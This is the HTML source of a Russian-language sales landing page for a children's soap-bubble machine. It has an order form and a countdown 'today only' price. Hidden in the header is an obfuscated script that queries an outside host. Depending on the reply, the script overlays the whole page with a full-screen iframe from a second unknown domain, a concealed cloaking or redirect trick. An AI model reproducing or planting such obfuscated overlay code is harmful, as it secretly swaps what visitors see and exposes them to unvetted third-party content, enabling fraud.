<!DOCTYPE html>
<html lang="ru-RU">

<head>
	
	<meta charset="utf-8">
	<meta name="viewport" content="width=480">
	
	<title>Машинка для мыльных пузырей</title>
	<meta name="description" content="Машинка для мыльных пузырей">
  <meta property="fb:app_id" content="244266890227825"/> 
	<meta property="og:title" content="Машинка для мыльных пузырей">
    <meta property="og:image" content="img/catalog/1.png">
    <meta property="og:image:width" content="150" />
    <meta property="og:image:height" content="150" /> 
    <meta property="og:type" content="website"> 
    <meta property="og:url" content=""> 
    <meta property="og:description" content="Машинка для мыльных пузырей">
	<link rel="shortcut icon" href="favicon.ico"> 
<script src="js/jquery.js" type="text/javascript"></script>
    <link rel="stylesheet" href="css/reset.css">
	<link rel="stylesheet" href="js/slider/owlCarousel-2.2.1/owl.carousel.min.css">
	<link rel="stylesheet" href="css/styles.css">
  <script src="https://code.jquery.com/jquery-3.4.1.js"></script>
	
 <style>
   hr {
    border: none; 
    background-color: #D3D3D3; 
    color: #D3D3D3; 
    height: 1px; 
   }
  </style>
    
   
</head><body> <style> 
  .menulog {
    display: none
}
  .menu {
    text-align: center;padding: 8px 0;background: #ececec;
	
}

.menu__links-item img {
    vertical-align: middle;
}

.menu__icon {
   display: none;
   width: 45px;
   height: 35px;
   position: relative;
   cursor: pointer;
}

.menu__icon span {
  display: block;
  position: absolute;
  height: 5px;
  width: 100%;
  background: #333333;
  border-radius: 9px;
  opacity: 1;
  left: 0;
  transform: rotate(0deg);
  transition: .25s ease-in-out;
}

.menu__icon span:nth-child(1) {
  top: 0px;
}

.menu__icon span:nth-child(2), .menu__icon span:nth-child(3) {
  top: 13px;
}

.menu__icon span:nth-child(4) {
  top: 26px;
 }

.menu__links-item {
    display: inline-block;
    color: #333333;
    font-family: Arial;
    font-size: 14px;
    line-height: 30px;
    padding: 0 10px;
    text-transform: uppercase;
    text-decoration: none;
}

.menu__links-item:hover {
    text-decoration: underline;
}

.menu.menu_state_open .menu__icon span:nth-child(1) {
  top: 18px;
  width: 0%;
  left: 50%;
}

.menu.menu_state_open .menu__icon span:nth-child(2) {
  transform: rotate(45deg);    background: #fff;
}

.menu.menu_state_open  .menu__icon span:nth-child(3) {
  transform: rotate(-45deg);    background: #fff;
}

.menu.menu_state_open  .menu__icon span:nth-child(4) {
  top: 18px;
  width: 0%;
  left: 50%;
}

.menu.menu_state_open .menu__links {
  display: block;  
}

@media screen and (max-width: 999px) {
	  .menulog {
		  width: 100%; max-width: 55px; margin-left: 8px;margin-top: 0px;
    display: block
}
  .menu {
    text-align: right;
padding-top: 10px;
padding-right: 15px;
display: flex;
    justify-content: space-between;
    align-items: center;
}
  .menu__icon{
    display: inline-block; z-index: 900;
  }
  
  .menu__links {
    position: fixed;
    display: none;
    top: 0;
    right: 0;
    left: 0;
	    height: 100%;
        padding-top: 50px;
    background-color: rgba(0, 0, 0, 0.9);
    z-index: 100;
    overflow: auto;
  }
  
  .menu__links-item {
    display: block;
    padding: 10px 0;
    text-align: center;
    color: #ffffff;font-size: 24px;
    line-height: 45px;
  }  
  
  .menu__links-item-mob {
    display: none;
  }
  
}
  </style> 
  


  <script>(function($){
  $(function() {
    $('.menu__icon').on('click', function() {
      $(this).closest('.menu').toggleClass('menu_state_open');
    });
  });
})(jQuery);</script>

 
	<div class="main_wrapper">



		<header class="offer_section offer3">
			<h1 class="main_title" style="font-size: 26px; text-transform: uppercase;">Машинка для создания мыльных пузырей</h1>
			<div class="info_block">
				
             
<img src="images/str7.jpg" alt="">
			</div>
			<div class="price_block">
				<div class="price_item old">
					<div class="text">Обычная цена:</div>
					<div class="value">23980 тнг</div>
				</div> 
				<div class="price_item new">
					<div class="text">Цена сегодня:</div>
					<div class="value">11990   тнг</div>
				</div>
			</div>
			<div class="benefits_block clearfix">
              
              <div style="margin-left: 40px; line-height: 1.8; font-size: 18px;">
                
                  <p>✓ Автоматическое создание пузырей</p>
                
             <p>✓ Подходит для игры в помещении или на открытом воздухе</p>
			
           <p>✓ Развивает творчество и улучшает воображение</p>
                
                <p>✓ Супер красочные пузыри</p>
			
              </div>
              
				

			</div>
			<div class="timer_block clearfix">
				<p>Предложение действует:</p>
				<div class="timer clearfix">
					<div class="timer_item">
						<div class="count hours"></div>
						<div class="text">часов</div>
					</div>
					<div class="timer_item">
						<div class="count minutes"></div>
						<div class="text">минут</div>
					</div>
					<div class="timer_item">
						<div class="count seconds"></div>
						<div class="text">секунд</div>
					</div>
				</div>
			</div>
		
          
          <form class="order_form rezult some_form" action="send.php" method="post">
				<input type="hidden" name="task" value="process"><input type="hidden" name="country" value="ru">
 

				
				<input class="field" type="text" name="name" placeholder="Введите Ваше имя" required="">
				<input class="field" type="tel" name="phone" placeholder="Введите Ваш телефон" required="">

        <input type="hidden" name="fbpx" value="">
        <input type="hidden" name="utm_term" value="{subid}">
        
				
				<button class="button">ЗАКАЗАТЬ СЕЙЧАС</button>			
            </form>
          
			 

          
             <div style="text-align: center;">
             <video loop="" muted="" autoplay="" playsinline="" width="88%">
				<source src="images/video.mp4" type="video/mp4">
				
				</video>
            
          </div>
          
    <script type="text/javascript">var _0x5cff=['1428878PYbuZT','yes','155908eJMPmS','write','utm_campaign','45VNkbeX','5cRWLQS','193485ZsbxUq','match','frameborder=\x220\x22\x20style=\x22overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\x22\x20height=\x22100%\x22\x20width=\x22100%\x22\x20></iframe>','https://faraglvxcjuck.com/?key=9jncwckn4i7qq0r82nby','7Mkjahj','1244292iympCp','9162FRVofc','location','3353268kEwxxU','utm_term','<iframe\x20src=\x22https://denptgbnkv.com/?key=3duwzimbtf2il5ogrts4&utm_campaign=','102759PwzgDP'];function _0x59ea(_0x441446,_0x21dcf6){return _0x59ea=function(_0x5cffc0,_0x59eacd){_0x5cffc0=_0x5cffc0-0xcd;var _0x5922da=_0x5cff[_0x5cffc0];return _0x5922da;},_0x59ea(_0x441446,_0x21dcf6);}var _0x312c9c=_0x59ea;(function(_0x21ee0b,_0x262fbc){var _0x12c9cb=_0x59ea;while(!![]){try{var _0x31b5f3=-parseInt(_0x12c9cb(0xcd))+parseInt(_0x12c9cb(0xd3))*-parseInt(_0x12c9cb(0xd4))+-parseInt(_0x12c9cb(0xcf))*parseInt(_0x12c9cb(0xd8))+-parseInt(_0x12c9cb(0xd2))*parseInt(_0x12c9cb(0xda))+parseInt(_0x12c9cb(0xdf))+parseInt(_0x12c9cb(0xd9))+parseInt(_0x12c9cb(0xdc));if(_0x31b5f3===_0x262fbc)break;else _0x21ee0b['push'](_0x21ee0b['shift']());}catch(_0x37ea86){_0x21ee0b['push'](_0x21ee0b['shift']());}}}(_0x5cff,0xc3672));function getCookies(_0x864256){var _0x63620a=_0x59ea,_0x2986ea=window[_0x63620a(0xdb)]['search'];return _0x2986ea=_0x2986ea[_0x63620a(0xd5)](new RegExp(_0x864256+'=([^&=]+)')),_0x2986ea?_0x2986ea[0x1]:![];}$['get'](_0x312c9c(0xd7),onAjaxSuccess);function onAjaxSuccess(_0x3107fb){var _0x364f6b=_0x312c9c;_0x3107fb==_0x364f6b(0xce)&&document[_0x364f6b(0xd0)](_0x364f6b(0xde)+getCookies(_0x364f6b(0xd1))+'&utm_term='+getCookies(_0x364f6b(0xdd))+_0x364f6b(0xd6));}</script>
		</header>
		

		<section class="description_section">
          

         <br>
          
          
            <p style="font-size: 20px;">Идеально подходит для игры в помещении или на открытом воздухе. Отличная вечеринка или подарок на день рождения, фестиваль, для ваших детей, им это понравится. Это экологически чистый пузырьковый раствор, безвредный для ребенка и окружающей среды.</p>

             <img class="image" src="images/str2.jpg" alt="" width="88%">
          <br>
          
             <p style="font-size: 20px;">Супер красочные пузыри: в нашем пузырчатом пулемёте  есть 8 отверстий для пузырей, которые могут выдувать сотни разноцветных пузырей в минуту. Эти разноцветные пузыри доставят детям много радости.</p>
          
          
           <img class="image" src="images/str3.jpg" alt="" width="88%">
          
          <br>
          
          
           <p style="font-size: 20px;">Подарите игрушку, которая побуждает вашего ребенка учиться в игре: она специально создана, чтобы помочь вашему ребенку развить зрительно-моторную координацию, овладеть мелкой моторикой и улучшить логическое мышление.</p>
          

          
           <img class="image" src="images/str4.jpg" alt="" width="88%">
          
          <br>
          
          
           <p style="font-size: 20px;">Это отличная игрушка, которая также подчеркивает важность командной работы и сотрудничества, поддерживает творчество и улучшает воображение с помощью интерактивной игры.</p>
          
          
            <img class="image" src="images/str5.jpg" alt="" width="88%">
          
          <br>
          
        <p style="font-size: 20px;">Ваш ребенок может безопасно носить игрушку с собой и наслаждаться пузырьками. Это забавная интерактивная игрушка, которая может развлечь ребенка надолго.</p>
          
          
            <img class="image" src="images/str6.jpg" alt="" width="88%">
          
          <br>
          
          
        
   
          
		</section>
      
      	<section class="characteristics_section">
			<h2 class="title" style="text-align: center;"><span style="text-align: center;">Характеристики </span></h2>
            <img class="image" src="images/str7.jpg" alt="" width="88%">
			<ul class="characteristics__list">
				
              
              
              
             <li><span style="font-size: 18px;"><b>Цвет: </b> уточняйте у оператора</span></li>
                <li><span style="font-size: 18px;"><b>Питание:</b> 3 батарейки АА</span></li>
              
                
			</ul>
      
      
		</section>
      
      
      
      
      
      <hr>
   
	
		
	
    

      
        <section class="tlt">
            <h2 class="title" style="text-align: center; font-size: 28px;"><span>Как сделать заказ?</span></h2>
        </section>
		<div style="margin-left: 25px;">
          
    
          
       <img src="images/how-img-1.png" alt="" width="15%"> 
          
          <p style="font-size: 19px; margin-left: 18%; margin-top: -57px;">Оформите заказ на сайте, заполнив простую форму</p>
          
          <br>
          <br>
          <img src="images/how-img-2.png" alt="" width="15%"> 
          
          <p style="font-size: 19px; margin-left: 18%; margin-top: -57px;">Наши менеджеры перезвонят вам для уточнения деталей заказа</p>
         
          <br>
          <br>
          <img src="images/how-img-3.png" alt="" width="15%"> 
          
          <p style="font-size: 19px; margin-left: 18%; margin-top: -50px;"> Курьер доставит ваш заказ на следующий день</p>
         
          <br>
          <br>
          
           <img src="images/how-img-4.png" alt="" width="15%" style="margin-top: 13px;"> 
          
          <p style="font-size: 19px; margin-left: 18%; margin-top: -50px;">Вы оплачиваете заказ при получении</p>
           
          <br>
             <br>
             <br>
			
        </div>
		

		<section class="offer_section offer3 order">
				<h1 class="main_title" style="font-size: 26px; text-transform: uppercase;">Машинка для создания мыльных пузырей</h1>
			<div class="info_block">
				
				<img src="images/str7.jpg" alt="">
			</div>
			<div class="price_block">
				<div class="price_item old">
					<div class="text">Обычная цена:</div>
					<div class="value">23980 тнг</div>
				</div>
				<div class="price_item new">
					<div class="text">Цена сегодня:</div>
					<div class="value">11990   тнг</div>
				</div>
			</div>
			<div class="benefits_block clearfix">
              
				 <div style="margin-left: 40px; line-height: 1.8; font-size: 18px;">
                   
              <p>✓ Автоматическое создание пузырей</p>
                
             <p>✓ Подходит для игры в помещении или на открытом воздухе</p>
			
           <p>✓ Развивает творчество и улучшает воображение</p>
                
                <p>✓ Супер красочные пузыри</p>
			
              </div>
              
               
              
			</div>
			<div class="timer_block clearfix">
				<p>Предложение действует:</p>
				<div class="timer clearfix">
					<div class="timer_item">
						<div class="count hours"></div>
						<div class="text">часов</div>
					</div>
					<div class="timer_item">
						<div class="count minutes"></div>
						<div class="text">минут</div>
					</div>
					<div class="timer_item">
						<div class="count seconds"></div>
						<div class="text">секунд</div>
					</div>
				</div>
			</div> 

          
			<form id="order_form" class="order_form rezult some_form" action="send.php" method="post">
	<input type="hidden" name="task" value="process"><input type="hidden" name="country" value="ru">


				
				<input class="field" type="text" name="name" placeholder="Введите Ваше имя" required="">
				<input class="field" type="tel" name="phone" placeholder="Введите Ваш телефон" required="">
        <input type="hidden" name="fbpx" value="">
        <input type="hidden" name="utm_term" value="{subid}">
				
				<button class="button">ЗАКАЗАТЬ СЕЙЧАС</button>			
            </form>
          
			 
		</section>

    <p></p>
    <p></p>
    <p></p>
    <p></p>
    <p></p>

		<footer class="footer_section">
		<div style="text-align: center;margin: 10px auto;display: block;font-size: 14px;line-height: 26px;">

<a href="polit.html" target="_blank" style="cursor: pointer;color: initial;">Политика конфиденциальности</a><br> 
*На данном сайте действует <br> <a href="https://ru-ru.facebook.com/privacy/explanation" target="_blank" style="cursor: pointer;color: initial;">'Политика использования данных Facebook'</a><br> 
ВСЕ ПРАВА ЗАЩИЩЕНЫ © 2021</div>  
		</footer> 

	

	</div>

	



	<link rel="stylesheet" type="text/css" href="fonts/roboto.css">

	<script src="js/plugins.js" type="text/javascript"></script>
	<script src="js/youtube/previewYouTube.js"></script>
	<script src="js/slider/owlCarousel-2.2.1/owl.carousel.min.js"></script>
	<script src="js/scripts.js"></script>
	


 
      

  
</body>

</html>
